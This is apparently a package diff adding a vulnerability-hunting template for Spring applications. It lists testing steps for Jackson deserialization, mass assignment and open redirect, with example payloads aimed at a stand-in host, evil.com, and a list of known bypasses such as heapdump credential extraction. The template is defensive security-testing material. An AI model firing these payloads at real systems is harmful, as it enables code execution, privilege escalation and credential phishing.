+3. Craft JSON payload with malicious type: \`{"@class":"org.springframework.context.support.ClassPathXmlApplicationContext","url":"http://evil.com/malicious.xml"}\`
+4. Show the gadget chain: which classes are available on the classpath?
+5. Common gadgets: JNDI (if JDK < 8u191), JDBC, Spring ClassPathXml, Commons Collections
+
+MASS ASSIGNMENT:
+1. Find \`@ModelAttribute\` usage without field restrictions
+2. Identify the target class and its sensitive setters (setRole, setAdmin, setEnabled)
+3. Craft request: \`POST /user/update?name=test&role=ADMIN&enabled=true\`
+4. Confirm Spring binds the extra parameters to the object
+5. Show privilege escalation or unauthorized state change
+6. Check if \`@InitBinder\` with \`setAllowedFields\` or \`setDisallowedFields\` exists
+
+OPEN REDIRECT:
+1. Find \`return "redirect:" + param\` or \`RedirectView(url)\` with user input
+2. Craft URL: \`http://target/login?redirect=https://evil.com\`
+3. Confirm redirect happens without validation
+4. Test protocol-relative: \`//evil.com\` and scheme variations: \`redirect:https://evil.com\`
+5. Show use in phishing chain: login page → redirect to credential harvester
+
+SEVERITY GUIDANCE:
+- SpEL injection (RCE): Critical
+- Actuator heapdump exposed without auth: Critical
+- Actuator env exposed without auth: High
+- Jackson deserialization with gadget chain: Critical
+- CSRF disabled + CORS with credentials: High
+- Mass assignment to admin/role field: High
+- Open redirect via redirect prefix: Medium
+- H2 console exposed in production: Critical
+
+RELEVANT REFERENCES:
+- Spring Security authorization architecture (filter chain ordering)
+- Jackson polymorphic deserialization documentation and known gadgets
+- Spring Boot Actuator endpoint security configuration
+- CVE-2022-22965 (Spring4Shell) analysis for class loader binding attack pattern`,
+    knownBypasses: [
+        'SpEL injection via error messages or dynamic expression evaluation with user input',
+        'Actuator heapdump credential extraction — download JVM heap, search for password strings',
+        'Actuator path bypass via semicolon: /actuator;/env bypasses Spring Security path matching on Tomcat',
+        'Spring4Shell pattern: class loader manipulation via ModelAttribute parameter binding',
+        'CSRF disabled + CORS allowCredentials — cross-origin state-changing requests with session cookies',
+        'Jackson deserialization gadget chains via @JsonTypeInfo with Id.CLASS',
+        'Open redirect via redirect: prefix with user-controlled URL in controller return value',
+        'Mass assignment via @ModelAttribute without @InitBinder field restrictions',
+        'H2 console SQL execution at /h2-console when enabled in production',
+    ],
+    specReferences: [
+        'Spring Security Reference Documentation',
+        'Spring Boot Actuator Endpoint Security',
+        'OWASP Java Security Cheat Sheet',
+        'Spring Expression Language (SpEL) Documentation',
+        'Jackson Polymorphic Deserialization CVEs',
+        'CVE-2022-22965 (Spring4Shell) Advisory',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=spring-misconfig.js.map

package/dist/hunt/templates/spring-misconfig.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"spring-misconfig.js","sourceRoot":"","sources":["../../../src/hunt/templates/spring-misconfig.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,eAAe,GAA0B;IACpD,EAAE,EAAE,kBAAkB;IACtB,IAAI,EAAE,qCAAqC;IAC3C,GAAG,EAAE,QAAQ;IACb,YAAY,EAAE;QACZ,QAAQ;QACR,YAAY;QACZ,gBAAgB;QAChB,YAAY;QACZ,aAAa;QACb,gBAAgB;QAChB,wBAAwB;QACxB,iBAAiB;QACjB,8BAA8B;KAC/B;IACD,gBAAgB,EAAE,CAAC,MAAM,EAAE,MAAM,EAAE,MAAM,EAAE,MAAM,EAAE,MAAM,CAAC;IAC1D,aAAa,EAAE,CAAC;IAChB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;kDAsEkC;IAEhD,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;iFAkE+D;IAE/E,aAAa,EAAE;QACb,oFAAoF;QACpF,0FAA0F;QAC1F,qGAAqG;QACrG,sFAAsF;QACtF,mGAAmG;QACnG,uEAAuE;QACvE,wFAAwF;QACxF,4EAA4E;QAC5E,oEAAoE;KACrE;IACD,cAAc,EAAE;QACd,yCAAyC;QACzC,wCAAwC;QACxC,iCAAiC;QACjC,iDAAiD;QACjD,0CAA0C;QAC1C,wCAAwC;KACzC;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/xxe.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const xxe: VulnerabilityTemplate;